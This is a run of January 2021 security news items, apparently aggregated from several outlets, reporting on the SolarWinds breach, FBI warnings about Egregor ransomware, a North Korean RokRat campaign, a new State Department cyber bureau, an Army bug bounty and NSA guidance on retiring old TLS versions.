10.1.2021 BigBrothers Securityaffairs
CISA revealed that threat actors behind the SolarWinds hack also used password guessing and password spraying in its attacks.
Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.
“Frequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[1]” reads the CISA’s alert. “However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products.”
CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by thet attackers.
The alert issued on January 6, highlights that it does not supersede the requirements of ED 21-01 or any supplemental guidance and does not represent formal guidance to federal agencies under ED 21-01.
CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.
Experts from CISA observed threat actors escalating privilege within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability. Then the attackers used to forge authentication tokens (OAuth) to issue claims to service providers and then attempt to access the Microsoft Cloud environments.
At the end of December, the Microsoft 365 Defender Team revealed that the goal of the threat actors behind the SolarWinds supply chain attack was to move to the victims’ cloud infrastructure once infected their network with the Sunburst/Solorigate backdoor.
In a report published on December 28, Microsoft said the threat actor’s primary goal was to gain access to cloud-hosted infrastructure, which in many cases was the company’s own Azure and Microsoft 365 environments.
To help victims deal with these “to-cloud” escalations, CISA has also published a second advisory today with guidance on how to search Microsoft-based cloud setups for traces of this group’s activity and then remediate servers.
Once deployed the backdoor, threat actors used it to steal credentials, escalate privileges, and make lateral movement within the target network to gain the ability to create valid SAML tokens. Microsoft experts reported that attackers created valid SAML tokens by stealing the SAML signing certificate or by adding or modifying existing federation trust.
Then the attackers created SAML tokens to access cloud resources and exfiltrate emails and sensitive data.
“This attack is an advanced and stealthy campaign with the ability to blend in, which could allow attackers to stay under the radar for long periods of time before being detected.” continues the post.
Recently, both US CISA and cybersecurity firm Crowdstrike released free detection tools to audit Azure and MS 365 environments.
SolarWinds Hires Chris Krebs, Alex Stamos in Wake of Hack
9.1.2021 BigBrothers Threatpost
Former CISA director Chris Krebs and former Facebook security exec Alex Stamos have teamed up to create a new consulting group – and have been hired by SolarWinds.
SolarWinds, which has been embroiled in a recent, widescale hack, has called in two security powerhouses for help: Former director of the Cybersecurity and Infrastructure Security Agency (CISA) Chris Krebs, and former Facebook security executive Alex Stamos.
Texas-based SolarWinds hired the duo as crisis-response consultants in the fallout of a cyberattack, discovered in December, in which the company’s network-management platform was targeted in a massive supply-chain hack. Several high-profile victims were affected – including the U.S. Department of Homeland Security (DHS), and the Treasury and Commerce departments.
Krebs is the former (and first) director of CISA, first appointed in 2018. In November, he was axed by the Trump administration in a move that drew public criticism from government officials and security experts alike.
2020 Reader Survey: Share Your Feedback to Help Us Improve
Stamos, meanwhile, is the former Facebook CISO, and the founder of the Stanford Internet Observatory. Stamos over the past year has been tapped by other companies hit by various security scandals – including Zoom, after a COVID-19 surge in its user base led to Zoom-bombing cyberattacks and privacy concerns.
First reported by The Financial Times on Thursday, the two paired up to launch a cybersecurity consulting business, called the Krebs Stamos Group. According to the company’s website, the consulting team works with companies to help them understand the various security risks that they face, as well as their weaknesses, “and the role they play in the security of our wider society.” Threatpost has reached out to the Krebs Stamos Group for further comment.
“Our concept is simple: help businesses manage cybersecurity risk as business risk, making the internet a safer place in the meantime,” said Krebs on Twitter on Friday.
Security experts, for their part, praised SolarWinds’ decision to tap the new firm, with security researcher Kevin Beaumont saying on Twitter: “This is a really smart hire.”
The need for security expertise moving forward is essential for SolarWinds as the company continues to face fallout from the hack. Just this week, the Department of Justice (DoJ) announced that cybercriminals breached its Office 365 email server as part of the massive hack.
In December, it was discovered that an attack vector leveraging the default password (“SolarWinds123”) of the SolarWinds platform gave attackers an open door into its software-updating mechanism. Combining that with SolarWinds’ deep visibility into customer networks became a “perfect storm” contributing to the widespread success of the attack, researchers have said. The U.S. government has identified Russia as the “likely” culprit behind the attack.
On Twitter on Friday, Stamos said: “We have already engaged in helping understand and recover from what looks to be one of the most serious foreign intrusion campaigns in history, and we will be helping others learn from this attack.”
SolarWinds CEO Sudhakar Ramakrishna (former CEO of Pulse Secure), who was brought on board before the company was notified of the cyberattack, said the company is engaging with industry colleagues, third-party security experts and intelligence agencies worldwide, as part of the investigation.
“We have engaged several leading cybersecurity experts to assist us in this journey and I commit to being transparent with our customers, our government partners, and the general public in both the near-term and long-term about our security enhancements to ensure we maintain what’s most important to us – your trust,” Ramakrishna said on Thursday.
FBI Warns of Egregor Attacks on Businesses Worldwide
9.1.2021 BigBrothers Threatpost
The agency said the malware has already compromised more than 150 organizations and provided insight into its ransomware-as-a-service behavior.
The FBI has alerted companies in the private sector to a spate of attacks using the Egregor ransomware. The malware currently is raging a warpath across businesses worldwide and has already compromised more than 150 organizations.
The agency issued an advisory (PDF) that also shed new light and identifies the innerworkings of the prolific malware, which has already been seen wreaking indiscriminate havoc against various types of organizations. Bookseller Barnes & Noble, retailer Kmart, gaming software provider Ubisoft and the Vancouver metro system Translink all are known victims of the ransomware.
Egregor — the name of which refers to an occult term meant to signify the collective energy or force of a group of individuals–is indeed the work of a “large number of actors” and is operating as a ransomware-as-a-service model, according to the FBI.
2020 Reader Survey: Share Your Feedback to Help Us Improve
“Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defense and mitigation,” the FBI said.
The FBI noted the ” number of ways” Egregor compromises business networks, “including targeting…employee personal accounts that share access with business networks or devices.” It also spreads via phishing emails with malicious attachments, or exploits for remote desktop protocol (RDP) or VPNs, the agency said.
Once access is gained, threat actors can move laterally inside networks. Egregor ransomware affiliates have been observed using common pen-testing and exploit tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner and AdFind to escalate privileges and make lateral moves across a network, as well as tools like Rclone — sometimes renamed or hidden as “svchost” — and 7zip to exfiltrate data, according to the FBI.
Corroborating what security researchers already have observed, the FBI said it first identified Egregor in September and said that since then, the threat actors behind the malware have worked quickly.
The document also describes what the typical modus operandi of Egregor looks like to victims, behavior also already observed in known and publicized attacks. In addition to engaging in typical ransomware behaviors, such as exfiltrating and encrypting files on the network as well as leaving a ransom note on machines to instruct victims how to communicate with threat actors via an online chat, Egregor also has a unique feature, the FBI noted.
“Egregor actors often utilize the print function on victim machines to print ransom notes,” the agency wrote in the document. Indeed, the group at this time the only known ransomware to run scripts that cause printers at the organization to continuously print out the ransom note, a behavior captured on video and posted to Twitter during an attack on South American retailer Cencosud in mid-November.
If victims refuse to pay, Egregor publishes victim data to a “public site,” the FBI noted. However, the agency—like many security experts–encourages organizations not to pay the ransom, as it “emboldens adversaries to target additional organizations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities,” the agency said.
Paying the ransom also does not guarantee that a victim’s files will be recovered, another well-known outcome of ransomware attacks, the FBI said.
“However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees and customers,” the agency said, encouraging organizations to report ransomware incidents to their local FBI field offices whether they decide to pay the ransom or not.
Welcome Bureau of Cyberspace Security and Emerging Technologies (CSET)
9.1.2021 BigBrothers Securityaffairs
United States Department of State approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET).
The United States Secretary of State Mike Pompeo approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET) that was first announced in 2019.
The CSET Bureau was created to increase the resilience of the country to foreign cyber-threats and lead the emerging cybersecurity diplomacy efforts.
“Secretary Pompeo has approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET) and has directed the Department to move forward with standing up the bureau.” reads the official announcement published by the US Department of State. “The need to reorganize and resource America’s cyberspace and emerging technology security diplomacy through the creation of CSET is critical, as the challenges to U.S. national security presented by China, Russia, Iran, North Korea, and other cyber and emerging technology competitors and adversaries have only increased since the Department notified Congress in June 2019 of its intent to create CSET.”
The US Department of State recognizes China, Russia, Iran, and North Korea as adversaries that could threat the national security.
Their operations have significantly increased in the last couple of years.
CSET will be tasked to secure cyberspace and protect critical technologies, and reduce the likelihood of cyber conflict.
“The CSET bureau will lead U.S. government diplomatic efforts on a wide range of international cyberspace security and emerging technology policy issues that affect U.S. foreign policy and national security, including securing cyberspace and critical technologies, reducing the likelihood of cyber conflict, and prevailing in strategic cyber competition.” concludes the announcement. “The Secretary’s decision to establish CSET will permit the Department to posture itself appropriately and engage as effectively as possible with partners and allies on these pressing national security concerns.”
SolarWinds Taps Firm Started by Ex-CISA Chief Chris Krebs, Former Facebook CSO Alex Stamos
9.1.2021 BigBrothers Securityweek
SolarWinds Hires New Cybersecurity Firm Founded by Former CISA Director Chris Krebs and Alex Stamos, Former Security Chief at Yahoo and Facebook
Following a significant security incident that sent shockwaves through the global cybersecurity community, SolarWinds has hired a newly formed cybersecurity consulting firm founded by Chris Krebs, former director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Alex Stamos, former security chief at Facebook and Yahoo.
Generically named the Krebs Stamos Group (KSG), its website currently shows limited information about the firm, saying its goal is to “help organizations turn their greatest cybersecurity challenges into triumphs.”
Krebs Stamos GroupThe consulting firm will apparently help customers assess their security posture, provide them with advice on “critical, long-lasting decisions,” and help them create cybersecurity teams, processes, programs and culture.
SolarWinds confirmed on Thursday that it has hired the company launched by Krebs and Stamos.
“We have brought in the expertise of Chris Krebs and Alex Stamos to assist in this review and provide best-in-class guidance on our journey to evolve into an industry leading secure software development company,” SolarWinds said in a statement to the media.
SecurityWeek has reached out to KSG for additional information about the company and its work for SolarWinds, but the company has yet to respond.
Krebs was fired from CISA in November by U.S. President Donald Trump after he refuted claims of electoral fraud and vouched for the integrity of the recent presidential election. After leaving Facebook in August 2018, Stamos became director of the Internet Observatory at Stanford University.
In the meantime, the U.S. government and cybersecurity companies continue to investigate the SolarWinds breach. According to some media reports, investigators are looking into the potential role played in the attack by a product from JetBrains, a software development firm based in the Czech Republic.
JetBrains said it was not aware of any investigation, but did not rule out that its TeamCity software was somehow exploited by hackers, either due to a misconfiguration or a vulnerability.
The United States this week officially said Russia was likely behind the attack on SolarWinds, an accusation that the Kremlin has denied. There is also some evidence that a second, unrelated threat actor may have also targeted SolarWinds.
While SolarWinds said that 18,000 customers may have used a compromised verison of its Orion product, the fallout is believed to have resulted in at least 250 private sector and government organizations being breached. The list of government victims includes the U.S. Justice Department, which admitted this week that hackers may have accessed some Microsoft 365 email accounts, but claimed there was no evidence that classified systems were compromised.
U.S. Department of State Approves New Cyberspace Security Bureau
9.1.2021 BigBrothers Securityweek
United States Secretary of State Mike Pompeo this week approved the creation of the Bureau of Cyberspace Security and Emerging Technologies (CSET).
Initially announced in 2019, the CSET Bureau should help the U.S. and its allies better handle expanding foreign cyber-threats. It is also meant as a step toward organizing America’s cyberspace and emerging technology security diplomacy.
China, Russia, Iran, and North Korea are considered by the United States threats to its national security, along with “other cyber and emerging technology competitors and adversaries,” the Department of State points out.
In fact, the agency also notes that challenges posed by these adversaries have increased significantly since the intent to create CSET was announced in June 2019.
Some of the international cyberspace security and emerging technology policy issues CSET will be in charge of include “securing cyberspace and critical technologies, reducing the likelihood of cyber conflict, and prevailing in strategic cyber competition,” the Department of State says.
Now that the secretary of state has decided to establish CSET, the agency can move forth and engage with its partners and allies to address national security concerns.
In September 2020, the U.S. Government Accountability Office (GAO) issued a report underlining that the Department of State did not involve relevant federal agencies in its effort to establish the CSET Bureau, especially since these agencies too are involved in cyber-security.
In its response to GAO’s findings (also included in the report), the Department of State argued that these agencies did not consult it when reorganizing their cybersecurity capabilities. However, the State Department said it did consult with congressional oversight committees.
FBI Warns Businesses of Egregor Ransomware Attacks
9.1.2021 BigBrothers Securityweek
Offered under a Ransomware-as-a-Service (RaaS) business model, the Egregor ransomware poses a great threat to businesses due to the use of double extortion, a recent private industry notification from the Federal Bureau of Investigation warns.
Initially observed by the FBI in September 2020, Egregor has claimed more than 150 victims to date, all around the world. Following network compromise, Egregor’s operators don’t just encrypt victims’ files, but also exfiltrate data, threatening to publish it online unless a ransom is paid.
The ransom note it drops on the compromised machines instructs victims to contact the operators via online chat. The threat actors demand a ransom to be paid in exchange for the exfiltrated information and a tool to recover encrypted files.
Egregor, the FBI says, is deployed by multiple individuals, meaning that tactics, techniques, and procedures (TTPs) used in attacks are varied and that defending against these attacks is challenging.
The ransomware’s operators were observed targeting business networks as well as employee personal accounts. Phishing emails carrying malicious attachments may be used, but Egregor would also exploit Remote Desktop Protocol (RDP) or Virtual Private Networks (VPNs) for initial access.
Furthermore, the threat actors behind Egregor may also leverage its RDP exploitation capability to move laterally inside the compromised networks.
Following initial access, pen testing and exploit tools are employed for privilege escalation and lateral movement. Some of these include Advanced IP Scanner, AdFind, Cobalt Strike, and Qakbot/Qbot. Utilities such as Rclone and 7zip are abused for data exfiltration.
Ransomware victims should not pay the ransom, as this encourages adversaries to target additional organizations and may attract more wannabe criminals to ransomware distribution, the FBI says.
“Paying the ransom also does not guarantee that a victim’s files will be recovered. However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers,” the industry notification reads.
Ransomware victims are encouraged to report the incidents, so that the FBI can gather data to prevent further attacks.
To mitigate ransomware attacks, organizations should keep data back-ups offline or in the cloud, secure these back-ups, use up-to-date security tools, ensure only secure networks are in use, enable two-factor authentication, prioritize patching, and review suspicious files and activity.
Probe Launched Into Impact of SolarWinds Breach on Federal Courts
9.1.2021 BigBrothers Securityweek
An investigation has been launched into the impact of the SolarWinds breach on the computer systems used by federal courts in the United States, which reportedly represented a target of interest to the hackers.
The Administrative Office (AO) of the U.S. Courts said an investigation was launched in mid-December after the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive instructing all federal agencies to immediately analyze their systems for evidence indicating that they may have been targeted through the Orion monitoring tool developed by SolarWinds.
The judiciary ordered all local and national courts to stop using the Orion software, but it may have been too late as the attackers could have already accessed highly sensitive information, including sealed documents.
A majority of the documents in the federal court system are available to the public, either for free or a small fee, but sealed filings often contain sensitive information that should not be made public.
“The AO is working with the Department of Homeland Security on a security audit relating to vulnerabilities in the Judiciary’s Case Management/Electronic Case Files system (CM/ECF) that greatly risk compromising highly sensitive non-public documents stored on CM/ECF, particularly sealed filings. An apparent compromise of the confidentiality of the CM/ECF system due to these discovered vulnerabilities currently is under investigation. Due to the nature of the attacks, the review of this matter and its impact is ongoing,” the public was told on Wednesday.
The judiciary announced that it has started rolling out additional safeguards to protect sensitive court records — highly sensitive court documents will only be accepted by federal courts on paper or via an electronic device such as a thumb drive, and they will be stored on a secure stand-alone computer rather than the CM/ECF system.
Investigative journalist Brian Krebs said he learned from sources that federal courts were actually “hit hard” by the SolarWinds breach, with the attackers delivering a piece of malware named Teardrop to its systems.
The threat group behind the SolarWinds supply chain attack, which the U.S. government believes is backed by Russia, leveraged trojanized updates for the Orion software to deliver a piece of malware named Sunburst to the Texas-based company’s customers. While the Sunburst malware has been delivered to thousands of organizations, the Teardrop malware was likely only sent by the attackers to a few hundred victims that were considered important targets.
The potential impact of the SolarWinds hack on federal courts was announced on the same day the U.S. Justice Department announced that it too was hit and the attackers may have accessed some Microsoft 365 email accounts. The DoJ claimed there was no evidence that classified systems were compromised.
ALERT: North Korean hackers targeting South Korea with RokRat Trojan
9.1.2021 BigBrothers Thehackernews
A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government.
Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT).
"The file contains an embedded macro that uses a VBA self decoding technique to decode itself within the memory spaces of Microsoft Office without writing to the disk. It then embeds a variant of the RokRat into Notepad," the researchers noted in a Wednesday analysis.
Believed to be active at least since 2012, the Reaper APT is known for its focus on public and private entities primarily in South Korea, such as chemicals, electronics, manufacturing, aerospace, automotive, and healthcare entities. Since then, their victimology has expanded beyond the Korean peninsula to include Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.
While the previous attacks leveraged malware-laced Hangul Word Processor (HWP) documents, the use of self-decoding VBA Office files to deliver RokRat suggests a change in tactics for APT37, the researchers said.
The Microsoft VBA document uploaded to VirusTotal in December purported to be a meeting request dated January 23, 2020, implying that attacks took place almost a year ago.
Chief among the responsibilities of the macro embedded in the file is to inject shellcode to a Notepad.exe process that downloads the RokRat payload in encrypted format from a Google Drive URL.
RokRat — first publicly documented by Cisco Talos in 2017 — is a RAT of choice for APT37, with the group using it for a number of campaigns since 2016. A Windows-based backdoor distributed via trojanized documents, it's capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Box, Dropbox, and Yandex.
In 2019, the cloud service-based RAT gained additional features to steal Bluetooth device information as part of an intelligence-gathering effort directed against investment and trading companies in Vietnam and Russia and a diplomatic agency in Hong Kong.
"The case we analyzed is one of the few where they did not use HWP files as their phish documents and instead used Microsoft Office documents weaponized with a self decode macro," the researchers concluded. "That technique is a clever choice that can bypass several static detection mechanisms and hide the main intent of a malicious document."
Biden to Appoint Cybersecurity Advisor to NSC – Report
8.1.2021 BigBrothers Threatpost
Anne Neuberger will join the National Security Council, according to sources.
President-elect Joe Biden has reportedly tapped the National Security Agency’s cybersecurity director to serve in a brand-new cyber-role on his National Security Council.
Anne Neuberger, a more than 10-year veteran of the NSA and its cyber-chief since 2019, will become the country’s deputy national security adviser for cybersecurity, according to Politico.
The move would elevate cybersecurity to a top-level priority for the U.S. government. The NSC is the President’s principal forum for considering national security and foreign policy matters with senior national security advisors and cabinet officials.
2020 Reader Survey: Share Your Feedback to Help Us Improve
Sources told Politico that Neuberger will thus be in charge of coordinating cybersecurity across the federal government’s agencies and departments. One of her very likely first tasks will be dealing with the sprawling SolarWinds cyberattack, carried out by nation-state hackers believed to be backed by Russia. The extent of the massive campaign is still being explored, and cybersecurity officials inside the Trump Administration have already said that the remediation process will be complex, difficult and extremely costly.
Anne Neuberger
Neuberger became the NSA’s first director of cybersecurity and deputy national manager in 2019, after serving as the NSA’s chief risk officer for five years. She is in charge of sharing threat intelligence between the NSA and public and private entities, especially regarding threats to critical infrastructure. NSA’s role in U.S. cybersecurity includes serving as the Office of the National Manager (ONM) for systems that handle classified information or are otherwise critical to military or intelligence activities.
Giving cybersecurity a seat at the NSC table dovetails with the incoming Biden administration’s stated interest in beefing up the U.S.’ cybersecurity posture.
“The Biden-Harris Administration will make cybersecurity a top priority, elevating it as an imperative across the government from day one,” a transition media spokesperson for the Biden transition told the outlet. “We will strengthen our partnerships with the private sector, academia and civil society; renew our commitment to international norms and engagement on cyber-issues; and expand our investment in the infrastructure and people we need to effectively defend the nation against malicious cyber-activity.”
FBI alert warns private organizations of Egregor ransomware attacks
8.1.2021 BigBrothers Securityaffairs
The US Federal Bureau of Investigation (FBI) issued a security alert warning private sector companies of Egregor ransomware attacks.
The US FBI has issued a Private Industry Notification (PIN) to warn private organizations of Egregor ransomware attacks.
The Egregor ransomware first appeared on the threat landscape in September 2020, since then the gang claimed to have compromised over 150 organizations.
The list of known victims includes Barnes and Noble, Cencosud, Crytek, Kmart, Ubisoft, and Metro Vancouver’s transportation agency TransLink.
Egregor is known to target printers of the compromised organizations, instituting them to print the ransom note.
The gang Egregor often exfiltrate files from the target network and if the victim refuses to pay, the operators publish victim data to a leak site.
“The FBI assesses Egregor ransomware is operating as a Ransomware as a Service Model. In this model, multiple different individuals play a part in conducting a single intrusion and ransomware event. Because of the large number of actors involved in deploying Egregor, the tactics, techniques, and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defense and mitigation.” reads the alert. “Egregor ransomware utilizes multiple mechanisms to compromise business networks, including targeting business network and employee personal accounts that share access with business networks or devices.”
Threat actors use phishing emails with malicious attachments as attack vector, they also exploit insecure Remote Desktop Protocol(RDP) or Virtual Private Networks to gain access to the networks.
Once gained access to the target network, the threat actors attempt to escalate privileges and make lateral movements using Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind.
Feds also added that the ransomware operators leverages tools like Rclone (sometimes renamed or hidden as svchost) and 7zip for data exfiltration.
FBI discourages victims to pay the ransom and urge them to report incidents to local FBI offices.
“The FBI does not encourage paying a ransom to criminal actors. Paying a ransom emboldens adversaries to target additional organizations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities.” concludes the alert.”Paying the ransom also does not guarantee that a victim’s files will be recovered.”
Below the list of mitigations provided by the FBI to defend against Egregor’s attacks:
Recommended Mitigations;
Back-up critical data offline.
Ensure copies of critical data are in the cloud or on an external hard drive or storage device.
Secure your back-ups and ensure data is not accessible for modification or deletion from the system where the data resides.
Install and regularly update anti-virus or anti-malware software on all hosts.
Only use secure networks and avoid using public Wi-Fi networks.
Use two-factor authentication and do not click on unsolicited attachments or links in emails.
Prioritize patching of public-facing remote access products and applications, including recent RDP vulnerabilities (CVE-2020-0609, CVE-2020-0610, CVE-2020-16896, CVE-2019- 1489, CVE-2019-1225, CVE-2019-1224, CVE-2019-1108).
Review suspicious .bat and .dll files, files with recon data (such as .log files), and exfiltration tools.
Securely configure RDP by restricting access, using multi-factor authentication or strong passwords.
US Govt kicked off ‘Hack the Army 3.0’ bug bounty program
8.1.2021 BigBrothers Securityaffairs
The U.S. government is going to launch the ‘Hack the Army 3.0’ bug bounty program in collaboration with the HackerOne platform.
The U.S. government launched Hack the Army 3.0, the third edition of its bug bounty program, in collaboration with the HackerOne platform.
The second Hack the Army bug bounty program ran between October 9 and November 15, 2019 through the HackerOne platform. The bug bounty program operated by the Defense Digital Service, along with the U.S. Department of Defense (DoD) paid more than $275,000 in rewards and a total of 146 valid vulnerabilities were reported.
The previous edition of the bug bounty program saw the participation of the 52 white hat hackers. US army asked participants to test more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website.
Now the US government announced that Hack the Army 3.0 that takes place between January 6 and February 17.
“Bug bounty programs are a unique and effective ‘force multiplier’ for safeguarding critical Army networks, systems and data, and build on the efforts of our Army and DoD security professionals,” said Brig. Gen. Adam C. Volant, U.S. Army Cyber Command Director of Operations. “By ‘crowdsourcing’ solutions with the help of the world’s best military and civilian ethical hackers, we complement our existing security measures and provide an additional means to identify and fix vulnerabilities. Hack the Army 3.0 builds upon the successes and lessons of our prior bug bounty programs.”
“We are proud of our continued partnership with the Army to challenge the status quo in strengthening the security of military systems and shifting government culture by engaging ethical hackers to address vulnerabilities” says Brett Goldstein, Director, Defense Digital Service. “We’re calling on civilian and military hackers to show us what they’ve got in this bug bounty and to help train the future force.”
The initiative continues to be operated by the Defense Digital Service (DDS) that will invite a selected number of military and civilian white hat hackers.
According to the program policy, only civilian participants are eligible for bug bounties.
“We are living in a different world today than even just a year ago,” said Marten Mickos, CEO of HackerOne. “Amidst disinformation and a global health crisis, citizens are increasingly wary of how, when, and where their information is used. For years, the U.S. Department of Defense and respective military branches have successfully strengthened their cybersecurity posture and protected precious data by enlisting the help of ethical hackers on HackerOne. Years later, hacker-powered security is not only a best practice in the US military, but it is now a mandated requirement among civilian federal agencies. There is only one way to secure our connected society, together, and the U.S. Army is leading the charge with this latest challenge.”
NSA Issues Guidance on Replacing Obsolete TLS Versions
8.1.2021 BigBrothers Securityweek
The National Security Agency (NSA) this week issued guidance for National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) cybersecurity decision makers, system admins, and network security analysts to replace obsolete versions of the Transport Layer Security (TLS) protocol.
TLS and Secure Sockets Layer (SSL) were designed to ensure the security and privacy of communication channels between clients and servers through encryption and authentication.
The protocols encrypt data in traffic, but older versions of these protocols have proven insecure, weakening data protection. Furthermore, new attacks against them have been discovered, further proving their inefficiency.
While older versions of the security protocols, namely SSL, TLS 1.0, and TLS1.1, have been deprecated in many existing online services and applications, there still are systems that rely on these insecure protocols, thus exposing entire networks.
“NSA recommends that only TLS 1.2 or TLS 1.3 be used; and that SSL 2.0, SSL 3.0, TLS 1.0, and TLS1.1 not be used,” the agency says.
In the newly released guidance, the NSA provides details on how network administrators and security analysts can identify and eliminate obsolete TLS configurations in their environments, including protocol versions, cipher suites, and key exchange methods.
“This will also help organizations prepare for cryptographic agility to always stay ahead of malicious actors’ abilities and protect important information. Using obsolete encryption provides a false sense of security because it may look as though sensitive data is protected, even though it really is not,” the NSA notes.
The first step, the agency notes, is to detect obsolete TLS configurations still in use in US government systems, through identifying clients and servers using older TLS versions and devices using obsolete cipher suites and/or weak key exchange methods.
As remediation steps, admins should configure monitoring devices to alert and/or block weak TLS traffic. However, a phased approach to detecting and fixing clients is recommended, to minimize impact.
“By using the guidance, government network owners can make informed decisions to enhance their cybersecurity posture. Since these risks affect all networks, all network owners and operators should consider taking these actions to reduce their risk exposure and make their systems harder targets for malicious threat actors,” the NSA notes.
Investigation Launched Into Role of JetBrains Product in SolarWinds Hack: Reports
8.1.2021 BigBrothers Securityweek
Cybersecurity companies and U.S. intelligence agencies are investigating the possible role played by a product from JetBrains in the recently discovered SolarWinds hack, according to reports.
The New York Times and Reuters reported on Wednesday that cybersecurity experts and government agencies are trying to determine whether the hackers that targeted SolarWinds may have abused software created by JetBrains to achieve their goal.
JetBrains is a software development company based in the Czech Republic. The firm has offices in Europe, Russia and the United States, and it claims that its solutions are used by over 9 million developers across 300,000 companies around the world, including 95 of the Fortune 100 companies and 79 Fortune Global 100 companies.
In a statement issued in response to the New York Times article, JetBrains CEO Maxim Shafirov said his company was not aware of any investigations into its software’s role in the SolarWinds breach, but noted that they are prepared to cooperate.
According to reports, the JetBrains product possibly abused by the SolarWinds hackers is TeamCity, a continuous integration and development system. Shafirov has confirmed that SolarWinds is a customer.
“It’s important to stress that TeamCity is a complex product that requires proper configuration. If TeamCity has somehow been used in this process, it could very well be due to misconfiguration, and not a specific vulnerability,” Shafirov said, pointing to a section of the JetBrains website where they regularly inform customers about the vulnerabilities patched in products.
The New York Times reported that SolarWinds has yet to confirm a definitive connection between TeamCity and the attack targeting its systems.
It’s worth pointing out that the attack on SolarWinds is believed to have started at least one year prior to its discovery, and it’s possible that SolarWinds has also been targeted by a second, unrelated threat actor.
The United States has officially said that the attack on SolarWinds was likely conducted by Russia, an accusation that Moscow has denied.
The breach, which involved the delivery of trojanized updates for SolarWinds’ Orion product, is believed to have allowed the attackers to breach the networks of at least 250 government and private organizations. The latest government organization to admit being hit is the U.S. Justice Department, which said on Wednesday that three percent of its Microsoft 365 email accounts were potentially affected, but claimed there was no evidence that classified systems were impacted.
NSA Urges SysAdmins to Replace Obsolete TLS Protocols
7.1.2021 BigBrothers Threatpost
The NSA released new guidance providing system administrators with the tools to update outdated TLS protocols.
The National Security Agency (NSA) is lighting a fire under system administrators who are dragging their feet to replace insecure and outdated Transport Layer Security (TLS) protocol instances.
The agency this week released new guidance and tools to equip companies to update from obsolete older versions of TLS (TLS 1.0 and TLS 1.1) to newer versions of the protocol (TLS 1.2 or TLS 1.3).
TLS (as well as its precursor, Secure Sockets Layer, or SSL) was developed as a protocol aimed to provide a private, secure channel between servers and clients to communicate. However, various new attacks against TLS and the algorithms it uses have been revealed – from Heartbleed to POODLE – rendering the older versions of the protocol insecure.
2020 Reader Survey: Share Your Feedback to Help Us Improve
“The standards and most products have been updated, but implementations often have not kept up,” said the NSA in its guidance this week. “Network connections employing obsolete protocols are at an elevated risk of exploitation by adversaries. As a result, all systems should avoid using obsolete configurations for TLS and SSL protocols.”
The NSA’s alert adds on to an existing collective push for updating TLS protocols, with some of the biggest standards bodies and regulators mandating that web server operators ensure they move to TLS 1.2 before the end of 2020. At the same time, many major browsers – including Chrome and Mozilla– have deprecated support for TLS 1.0 and TLS 1.1.
As of March 2020, more than 850,000 websites still used TLS 1.0 and 1.1 protocols. Meanwhile, according to the SANS ISC in December, TLS 1.3 is supported by about one in every five HTTPS server, showing steady adoption of the newer protocol version.
“TLSv1.3 is arguably the first TLS protocol version which focused more on security concerns than it did on compatibility issues,” Craig Young, principal security researcher at Tripwire, told Threatpost. “TLSv1.2 and earlier specifications have repeatedly included esoteric workarounds for known attacks rather than deprecating broken technologies. TLSv1.3 introduces new handshake mechanisms and ciphersuites with mandated perfect forward secrecy and authenticated encryption. The overall impact is a strong protection against downgrade attacks and other cryptographic attacks.”
The NSA’s alert, intended for the National Security System (NSS), Department of Defense (DoD), and Defense Industrial Base (DIB) cybersecurity leaders, as well as system administrators and network security analysts, provided further guidance on how to detect and update outdated TLS versions.
Part of the NSA’s recommendations include using network monitoring systems to detect obsolete TLS versions. The NSA also provided further information about prioritization of remediation for obsolete TLS versions.
“Network monitoring devices can be configured to alert analysts to servers and/or clients that negotiate obsolete TLS or can be used to block weak TLS traffic,” according to the NSA. “The choice to alert and/or block will depend on the organization. To minimize mission impact, organizations should use a phased approach to detecting and fixing clients and servers until an acceptable number have been remediated before implementing blocking rules.”
Security focused content delivery network provider Cloudflare has previously stated that “both TLS 1.0 and TLS 1.1 are insufficient for protecting information due to known vulnerabilities. Specifically for Cloudflare customers, the primary impact of PCI is that TLS 1.0 and TLS 1.1 are insufficient to secure payment card related traffic.”
Cloudflare did not respond to a request for comment from Threatpost.
“There really is no reason for organizations to delay in deploying TLSv1.3 in 2021, but some organizations may be hesitant because of the potential impact on SSL/TLS inspection systems,” Young told Threatpost. “This is a potential problem because these products often work by intercepting TLS connections and TLSv1.3 has been designed to guard against this.”
SolarWinds hackers had access to roughly 3% of US DOJ O365 mailboxes
7.1.2021 BigBrothers Securityaffairs
